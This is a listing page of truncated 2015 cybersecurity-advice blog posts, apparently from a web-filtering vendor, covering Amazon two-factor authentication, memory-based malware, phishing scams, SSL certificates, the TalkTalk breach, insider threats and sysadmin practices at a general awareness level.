Online shoppers now have the option of using Amazon two-factor authentication on their accounts to improve security. Any users concerned about the number of cyberattacks being suffered by large retailers should take advantage of the new security measure and add Amazon two-factor authentication to their Amazon account at the earliest possible opportunity. It is not clear exactly when the retail giant implemented the new security feature, as an announcement was not made; however, some users started to notice the option this week. At the present moment in time it is not a mandatory security measure to use, but it is strongly advisable to add it to your account. Large retailers are big targets for cybercriminals. Retailers such as Amazon may have invested millions or even hundreds of millions in data security solutions and cybersecurity protections, but no company is impervious to attack. One thing that is certain is a great many cybercriminals will attempt to break through Amazon cybersecurity defenses. The company’s colossal database of customer information would be a sizeable reward for all the effort. The retail giant has an estimated 244 million customers. 244 million credit card numbers could be sold for a considerable sum of money. Why Amazon two-factor authentication doesn’t offer 100% security It would be nice to live in a world where it is impossible to be hacked or have one’s account details compromised. Unfortunately, but there is no such thing as a 100% secure account because no system is totally foolproof. Two-factor authentication does however get pretty close and, even better, it is easy for companies to implement and straightforward for customers to activate. Most of the global retailers and major internet brands use two-factor authentication for user accounts; although for some reason (only known to Amazon) the retail giant has refrained from adding this additional security measure until now. It is not a mandatory security measure and will not be added to accounts automatically. If users want enhanced account security, they can access their account settings and turn it on. How to Add Amazon two-factor authentication to your account Making your...
by G Hunt |
November 17, 2015 |
Cybersecurity Advice
In order to manage cybersecurity risk effectively, data protection policies must be developed. However, a new research study conducted by risk and business consulting firm Protiviti, suggests that a third of companies have not yet developed data protection policies. When data protection policies have been implemented, many are insufficient and leave the company vulnerable to a cyberattack. Data protection policies are inadequate or non-existent in many cases Over 700 information security professionals and executives were polled and asked about their company’s efforts to keep data secure. Questions were asked about data retention, storage and secure disposal, as well as governance, privacy policies and a wide range of cybersecurity controls. It would appear that many firms were not managing cybersecurity risk effectively, leaving them vulnerable. Information security solutions may have been implemented, but basic controls such as the development and issuing of data protection policies had been neglected. When policies had been written and implemented, many were insufficient and did not cover even a fraction of the elements necessary to keep systems and data secure. Many security holes were allowed to persist. To manage cybersecurity risk, start at the top The board must become involved in cybersecurity decisions and should take a greater interest in keeping their organizations secure. Policies must be developed that set rules for the entire organization, and awareness of data and network security must be improved. All members of staff must be made aware of the current threat levels and a culture of security awareness developed. Best practices must be defined and all users monitored to make sure that those practices are being followed. The study indicates that board level involvement in cybersecurity issues is becoming more common, yet only 28% of survey respondents indicated there was a current high level of board engagement in such issues. What is even more worrying is there has actually been a fall of 2% in high-level engagement year on year. 15% of respondents said board engagement in cybersecurity matters was low, while a third said engagement was at a...
by G Hunt |
November 16, 2015 |
Cybersecurity Advice
Think you have to open an infected email attachment or download a file to your computer to acquire a malware infection? Not with the latest memory based malware. Drive-by attacks are taking place that do not need any user-interaction. These file-less malware infections use malware that resides in the computer memory, and RAM memory is not scanned by most anti-virus programs. The good news is attacks of this nature are rare. The bad news is the malware is being increasingly used by cybercriminals. Fortunately, malware that resides in the memory doesn’t survive a reboot. Unfortunately, by the time your computer is rebooted, you may have already lost your sensitive data. How often do you reboot? At the end of your working day? That could potentially give a hacker a full 8 hours to record your keystrokes or download files to your computer. A lot of damage can be done in 8 hours. There is another problem. Hackers are now creating memory-based malware that actually survives a reboot. The malware has been configured to hook into an API. When the computer is restarted, the malware is reloaded back into the RAM. Memory-based malware exploits security vulnerabilities in outdated software If a user is convinced to visit a malicious website, or responds to a spam email containing a link to one of those sites as part of a phishing campaign, their computer can be infected almost immediately. A user is usually directed to a web page containing an exploit kit: The Angler exploit kit for example. Code on the website probes the users’ browser for security vulnerabilities. Security vulnerabilities in Adobe Flash or Adobe Reader could be exploited, or Java, Silverlight or any number of plug-ins that the user has installed. However, instead of the vulnerability being used to download a file to the hard drive, code is inserted into the memory. This does not trigger an Anti-Virus program because no files are downloaded to the computer. This allows the hacker to perform a drive-by cyberattack, stealing information quickly and silently. That information could include login names, passwords, bank account information, or anything entered via the keyboard. These types of cyberattacks...
by G Hunt |
November 13, 2015 |
Cybersecurity Advice
Using a Mac is safer than using a computer running Windows. That’s not to say it is not possible to inadvertently install a virus or malware on a Mac. It is just that hackers tend to focus more on PCs. From a hacker’s perspective, it is better to try to infect as many devices as possible and more people own PCs than Apple devices. According to research conducted by IDC, sales of Macs have increased by just over 16% this year. However, while accurate figures are difficult to find, approximately 90% of computers use Windows software. This makes the operating system much more likely to be attacked. If you were a hacker would you concentrate on the 90%? That does not mean that Mac users are immune to attack: BlackHole RAT, OS X Pinhead, Mac Flashback, and Mac Defender all targeted Mac users. Mac users do face risks and must be cautious when using the Internet. They may not face such high risks, but they can just as easily fall for scams. Phishing websites will also work just as well on Macs users as they will on everyone else. That’s because phishing techniques are employed to fool the user of the device. It doesn’t matter what device is being used to access the Internet. New phishing scam alerts iTunes users to account limitations Mac users have recently been targeted by a campaign claiming iTunes accounts have been compromised. Most recently a phishing scam has been launched advising iTunes account holders that their accounts have been limited for security reasons. They are informed of this by email and are provided with a link. If the link is clicked they are directed to a scam site and must enter information to lift the account limitation. A number of data fields must be completed and a credit card number entered. This is an easy scam to identify as, even when accounts have been compromised, a service provider would not typically ask for a credit card number for identity verification. If in doubt, just access your Apple account directly and check to see if there is a problem with your account. Never use the link supplied in an email. Mac Internet scam reported offering urgent tech support A Mac internet scam warning was recently issued after the discovery of a...
by G Hunt |
November 12, 2015 |
Cybersecurity Advice
If you want your employees to browse the Internet safely you should try to restrict access to websites that have a valid SSL certificate. It is now common knowledge that SSL certification means a website is secure and can be trusted; but is that true? Does a SSL Certificate mean a website is safe to use? The answer is a definite no. The HTTPS or a SSL certificate alone is not a guarantee that the website is secure and can be trusted. Many people believe that a SSL Certificate means a website is safe to use. Just because a website has a certificate, or starts with HTTPS, does not guarantee that it is 100% secure and free from malicious code. It just means that the website is probably safe. In the vast majority of cases the sites will be. Just not always. Unfortunately, phishers and other cyber criminals have discovered how to exploit trust in SSL certificates. Some phishing websites have valid SSL certificates in place. This means even when you think your employees have been restricted to safe websites, they are still not protected from phishing sites. Relying on a block on sites that do not use SSL certification is a mistake, and potentially a very costly one. It is a good idea to restrict access to unsecure websites, but further protections will be required if you want to be sure that your employees and your network are properly protected. Selectively block websites at work and take control over the content that your employees can access. See how with a FREE WebTitan demo. Book Free Demo What is a SSL Certificate? In short, an SSL Certificate is a file that permanently binds a key to a company’s website. When an SSL certificate is installed on a company’s web server, connections with that website will be secure. Information will be sent via port 443 using the https protocol. SSL Certificates are used by websites to secure sessions with web browsers. You will be able to tell which websites have an SSL certificate in place because they will have a padlock next the web address. This means that the connection with that website is via a secure connection. The information you enter when connected to the website can be used with confidence, and most importantly, it...
by G Hunt |
November 9, 2015 |
Cybersecurity Advice
British mobile phone and broadband provider TalkTalk discovered it had been hacked late last month; however further information has emerged that suggests TalkTalk hacking scams are increasing in number. Over a million customers’ data are apparently being offered for sale on the dark net, with criminals already using the data to defraud victims. Over four million customers were believed to have been affected by the hacking scandal at first, although not all of the company’s customers are now understood to have been affected. A criminal investigation was launched a few days after the hack was discovered. Initial reports suggested an Islamic terrorist group from Russia were behind the attack, having publically claimed responsibility. This claim appears to be false. The Metropolitan Police Cyber Crime Unit acted fast and just a few days after the attack was announced, a 15-year old teenage boy was arrested in Northern Ireland on suspicion of being behind the attack. A few days later, a second arrest was made, this time a 16-year old boy from West London. A 20-year old was arrested in Staffordshire in connection with the hack, and now a fourth individual has been arrested: A 16-year old boy from Norwich has been detained. 1.2 million email addresses obtained by the hackers The official figures released by TalkTalk are much lower than the initial estimates, but the hack still ranks as one of the biggest UK hacking scandals to be reported in recent years. A statement released by the company revealed that approximately 1.2 million email addresses had been obtained in the attack, customer names and phone numbers were also stolen, and 21,000 bank account numbers and sort codes were accessed, presumed stolen. A later press release indicated that 156,959 individuals had been affected, and the earlier figure was “bits of data,” including email addresses, names, and phone numbers. Credit card numbers were compromised, but since they did not contain complete numbers there does not appear to be a risk of them being used inappropriately. However, that is not to say that the data will be useless. Phishers may well devise campaigns to obtain the remaining digits from...
by G Hunt |
November 5, 2015 |
Cybersecurity Advice
A new study conducted by CompTIA has highlighted the risks that are being taken by end users, and suggest low awareness of security threats. End users’ lack of knowledge of basic security measures continually frustrates IT security professionals. End users are usually seen as the weakest link in the security chain, and the results of this study are unlikely to see many minds changed. The study also suggested the persons most likely to take risks and jeopardize security are in their early twenties: Gen Y. Gen Y Has Low Awareness of Security Threats One of the tests conducted was a relatively straightforward but ingenious test of risk awareness. CompTIA researchers dropped 200 unmarked thumb drives in locations that received high volumes of foot traffic. The researchers wanted to find out how many individuals would pick up the drives and plug them into their computers. Thumb drives can be purchased cheaply, but are extremely useful. Finding one in the street may be seen as a lucky find. However, plugging such a drive into a computer carries a huge risk. There is no knowing what software is installed on the drive, and simply plugging it into a computer could easily result in malware or viruses being installed. In this case, doing that just resulted in a pop up message being displayed which prompted the new owner of the thumb drive to send an email to the researchers to let them know that the device had been found and plugged in. In total, 17% of the 200 thumb drives resulted in a response being received by the researchers. Not all of the individuals who picked up the thumb drive will have responded to pop-up request to send an email to the study organizers, so the number of individuals who did plug in the drive may well have been higher. The company also conducted a survey to discover more about end user awareness of security threats. Over 1200 completed surveys were collected by the company, and the results show that many end users are taking considerable security risks. Those risks could result in laptops, computers, and mobile phones being compromised. If IT security professionals were worried about end user risk taking before, they are likely to be even more...
by G Hunt |
November 2, 2015 |
Cybersecurity Advice
Liability for Employee Internet Usage: Can an Employer be Liable for an Employee’s Online Activity? There are numerous benefits to be gained from allowing employees access to the Internet. Information can be found quickly, contacts can be easily developed, new suppliers easily located, products purchased, research conducted and many more benefits can be realized. Unfortunately, the provision of Internet access to employees does occasionally lead to abuse. An employee could use the Internet to access personal gambling accounts and play online poker at work, or social media websites could be used excessively. Individuals can and do view pornography at work. Threats and disparaging comments may be posted online. You can also add the illegal file sharing, hacking of other corporations, and illegally accessing databases to that list. There are plenty of other ways of abusing Internet access and, if it is possible to be done, an employee somewhere will have already done it. The majority of these acts are committed only by a minority of employees. They rarely cause an employer, co-worker or other individual to come to any harm. However, this is not always necessarily the case. Should harm occur, or an employee breaks the law, the employer could be found to be liable for the employee’s actions. There have been a number of cases when employers have been found to be liable for the actions of employees, such as when actions have adversely affected work colleagues. Some of the most common reasons for lawsuits have been sexual harassment of co-workers, threats of violence, racial harassment, and discrimination. Respondeat superior – Employer Liability for the actions of an employee The legal term for vicarious liability of an employer for actions committed by an employee is Respondeat superior. This is nothing new. It has been written into the law for over 100 years. Today, Respondeat superior does not only apply to verbal actions, it also applies to actions committed using email and abuse of the Internet. It is not limited to actions against co-workers either. Liability for employee Internet usage may result from comments posted on forums. Typically, an employer would...
by G Hunt |
October 1, 2015 |
Cybersecurity Advice
Visiting a coffee shop for a caffeine fix usually means having the opportunity to save some bandwidth by connecting to a free Wi-Fi network. In fact a coffee shop without free Wi-Fi is unlikely to be anywhere near as busy and those offering patrons the opportunity to connect to the Internet for free. Even airports, restaurants, shopping centers and many pubs allow visitors to connect to their Wi-Fi for free. Many freelance workers even head to cafes to a full day’s work, while others just check email or surf the Internet. The ability to connect to someone else’s Wi-Fi is convenient and saves money. However, as many people discover, it may not be quite as free as they think. Connecting to free Wi-Fi hotspots carries considerable risks. There may actually a considerable cost. Identity theft and the emptying of a bank account! The importance of a secure Wi-Fi connection Many free Wi-Fi networks allow any user within range to connect without even having to register. These open networks really are open to anyone, and that means open to criminals as well. When users connect to these networks they allow any individual who is also connected to see a considerable amount of their data. Should a person with the inclination and a modicum of technical skill choose to inspect network traffic, they could potentially see the websites that are visited, read the emails that are sent, and even view login names and passwords. Installing malware on every device that connects is also pretty straightforward. Not all Wi-Fi networks are open. Some coffee shops and free Wi-Fi hotspots require users to identify themselves. Access can only be gained if users logon. This requires the use of a token or password which is only provided to people who create accounts. These Wi-Fi networks use encryption that prevents data from being intercepted. That does not mean that these networks are entirely secure, only that additional security controls have been employed to make them safer. If operators of public Wi-Fi networks really want to protect their users from the myriad of viruses and malware on the Internet, additional security controls should be employed. One of the best options in this regard...
by G Hunt |
September 17, 2015 |
Cybersecurity Advice
Most system administrators have a rather long to-do list. As soon as one item is cleared, another two seem to take its place. Oftentimes there are simply not enough hours in the day to deal with all of the issues. There are software problems, hardware problems, user problems, and it can be hard to find time to be proactive instead of reactive. We would like to make your job easier and reduce the number of items on your future to-do lists. With this in mind we have listed five issues that you should avoid to prevent future headaches. They are basic, but that is why many system administrators forget them. Network Security No No’s Never host more than Windows Active Directory on a domain controller Active Directory looks after the identities and relationships of your network. It will allow you to provide all employees with SSO (Single Sign-On) access. However, it is important that Active Directory is isolated and the machine you use is not used for anything else. Don’t mix up your assets, as in the event of one being compromised, anything else hosted on the same machine is also likely to be affected. After all, hackers are likely to have a snoop around and see what else is running on a server they have managed to gain access to. Keep everything separate, and you will be limiting the damage that can be caused in the event of a security breach. Don’t access a workstation using your administrator credentials Your administrator login credentials, if compromised, would allow a malicious insider or outsider to gain access to systems where a lot of damage can be caused. If you login to a compromised workstation using your administrator login, you could be giving your access rights to a hacker. Cached login credentials are not difficult to obtain. Github offers code that will allow anyone to change Local Admin privileges to Domain Admin privileges. If that happens, a hacker really can unleash hell. Don’t ever reuse passwords One of the most elementary data security measures is to ensure passwords are impossible to guess. In the unlikely event that your password is guessed, or is somehow compromised, it is essential that the password cannot be used to access any other...
by G Hunt |
September 8, 2015 |
Cybersecurity Advice
There has been a lot of talk recently about Social Engineering scams, but what is social engineering?. Social engineering is a term used in social science to describe the psychological manipulation of people into taking a particular action and influencing large groups of people. It is a technique used for good and bad. Politicians and governments use social engineering, and advertisers are known to use social engineering to convince the public to purchase products. In recent months, most talk of social engineering has been about information security. Hackers and other online criminals are now using social engineering techniques to get Internet users to reveal their sensitive information, such as login names and passwords, and even credit card numbers and bank account details. The majority of large scale data breaches caused by hackers and malicious outsiders are usually discovered to include an element of social engineering. How can you protect yourself from being manipulated into revealing information? How can you protect yourself and your company from employees falling for social engineering scams? How is Social Engineering Used by Cybercriminals? The commonest methods employed by cybercriminals to manipulate users into taking certain actions are detailed below. Being aware of how social engineering is used will help you to protect yourself and your employees from becoming victims of scams and phishing campaigns. Abuses of Trust: Online criminals know that if they want to get something from people, it is far easier to get what they want if they pretend to be someone that person trusts. People are wary of strangers after all. If a total stranger came up to you in the street and asked for your PIN number or email address and password, you would naturally not tell them. However, on the Internet it is not always so easy to tell if someone is actually a stranger. Seemingly legitimate reasons are also provided for disclosing such information. Emails sent from colleagues, friends and family members If you receive an email from someone you trust, chances are you will be more likely to respond to a request than if the same email had been sent by a stranger. If a...
by G Hunt |
August 25, 2015 |
Cybersecurity Advice
Beware the threat from within: How to deal with insider threats IT security professionals and C-suiters are well aware of the threat from hackers. Cyberattacks have been all over the news recently. Major security breaches have resulted in millions of files being stolen. Patient health records have been targeted with the cyberattack on Anthem Inc., the largest ever healthcare data breach ever recorded. That cyberattack, discovered in February this year, involved the theft of 78.8 million health insurance subscriber records. Target was attacked last year and hackers managed to obtain the credit card details of an estimated 110 million customers. The finance industry was also hit hard in 2014, with 83 million J.P. Morgan Chase accounts compromised by hackers. Cybersecurity defenses naturally need to be put in place, monitored, and bolstered to deal with the ever changing threat landscape. However, it is important not to forget the threat from within. Malicious insiders can be just as dangerous, and often more so than hackers. Just ask the NSA. They know all too well how dangerous insiders can be. Edward Snowden managed to steal and release data that has caused considerable embarrassment. In his case, he wanted the world to know what the NSA was up to. The NSA had gone to great lengths to make sure that what occurred behind its walls stayed secret. Malicious insiders are often individuals who have been given access to patient and customer records, as well as the intellectual property of corporations, company secrets, product development information and employee databases. They are therefore potentially able to steal everything. The harm that can be caused by malicious insiders is therefore considerable. It is not just theft of data that is a problem. Insiders may use their access to computer systems to defraud their employers, destroy data, or install malware and ransomware. Unfortunately, tackling the threat from within is a much more difficult task than preventing external attacks. Bear in mind that insiders are not necessarily employees. They can include business partners and associates, contractors and past employees. Which insiders pose the biggest threat...
by G Hunt |
August 4, 2015 |
Cybersecurity Advice
Not all habits are bad. Sure you should ease up on the alcohol, give up smoking, and stop biting your nails, but make sure you take some time to develop some good habits. Take a look at the best practices below, ensure you perform them regularly, and before long they will become second nature. You will then be able to legitimately rank yourself alongside the best system administrators. Even better, you should find you have far fewer bad days and even some when everything runs smoothly without a hitch. Develop a ticket system and keep on top of requests You are likely to receive more requests for assistance than you can deal with in a single day. If you are regularly flooded with requests, some will invariably be forgotten. Sometimes you will deal with an issue only for a user to complain that you have not. It is useful to be able to prove that you have dealt with a problem in a timely manner. A ticketing system will allow you to do this, as well as help you prioritize tasks and never forget a single reported system or computer issue. Your system need not be expensive or complicated. If you work on your own in a small business, you can set up a very simple MS Access database to log all requests. Even a spreadsheet may suffice. A word document would also work. The important thing is that all requests are logged. If there is more than one system administrator employed in your company, it is probable that you may need to have a more complex system. Helpdesk software is likely to be required if you are having to deal with hundreds of requests. They will need to be allocated to staff members, and follow-ups will be required. Making sure all queries have been answered and all reported problems resolved will be a nightmare without such a system in place. Keep a log of your activity If you ever have to justify what you have spent all your time doing, your ticketing system is your friend. You can show the volume of requests you have received/resolved on a daily basis, and use that information to show that your time has been well spent. One clever way of reducing the requests you get is to log the requests and send the user (and his or her line manager) an email...
by G Hunt |
May 14, 2015 |
Cybersecurity Advice
Hackers and malicious insiders are trying to break through security defenses to get their hands on sensitive data, but what data are they actually looking for? Which data needs to be better protected? There are federal laws that require physical, technical and administrative controls to be put in place to keep data secure. Fail to protect certain data types and there could be serious trouble, regardless of whether a hacker actually manages to compromise your network. Some data types are obvious, others less so. Credit card numbers, bank account information, Social Security numbers and healthcare data all require robust security measures to keep the information secure. Have you made sure that each of the following 9 data types have appropriate controls in place to prevent unauthorized individuals from gaining access. Financial Data The goal of many hackers and cyber criminals is to gain access to bank account information, and the logins and passwords used to access online accounts. Once they have this information they can use it to make transfers and empty accounts. Credit/debit card numbers are also sought in order to make online purchases and create fake cards. PIN numbers, if stored, along with answers to security questions must similarly be protected with robust controls. Medical Data The Health Insurance Portability and Accountability Act (HIPAA) requires all covered entities to put physical, technical and administrative controls in place to keep medical data secure. In the wrong hands, medical data can be used to discriminate and defame. It is also used in spear phishing campaigns, and used with other data to commit fraud. Failure to secure these data is a violation of HIPAA Rules, and financial penalties are sure to follow. Criminal charges can even be filed against individuals for failing to secure highly sensitive data. Driver’s License Numbers A valid driver’s license number can be used to create fake driving licenses. These are not only useful for people who are not legally allowed to drive, they can be used to obtain other forms of identification and commit identity theft and fraud. Student Data Student data is increasingly being sought by criminals...
by G Hunt |
February 11, 2015 |
Cybersecurity Advice
You are faced with an insurmountable problem: Your job requires you to keep the business secure from external attacks, and you must take action to deal with the threat from malicious insiders. It is your responsibility, and your job may well be on the line if something goes wrong and data is stolen, or your network is infected with a virus or malware. Unfortunately, you have not had a budget increase and cannot afford to purchase the software solutions necessary to protect your business from attack. This is a problem faced by many IT professionals. Management understands there is a risk and knows the risk is considerable, yet they expect you to work your magic with your hands tied behind your back. You are not a magician; so, if management wants to be properly protected, it is your job to convince the powers that be that you need a bigger budget. We know you have already tried this. What you therefore need to do is improve your communication skills. You need to find a way to convince the management that additional funding is absolutely essential. One of the best ways of doing this is to explain that security risk is actually business risk. You are not alone – 50% of IT professionals work with inadequate security measures IT department funding is almost always limited. It is not possible to purchase the highest quality equipment, the best possible security measures, and have enough staff members to perform all of the required work. So if you are stressed, are suffering a critical lack of funding, or are desperately understaffed – you are not alone. The situation has recently been assessed by the Ponemon Institute. Its latest survey probed IT security professionals and asked them about the level of security in their organization. It would appear that when it comes to cybersecurity protections, the management and IT department heads are often not on the same page. The survey was large. Over 5,000 IT professionals send back responses to the survey and more than 2,500 of those respondents said their cybersecurity measures were inadequate. The problem for many was the fact that the upper management simply did not understand just how important it was to improve...
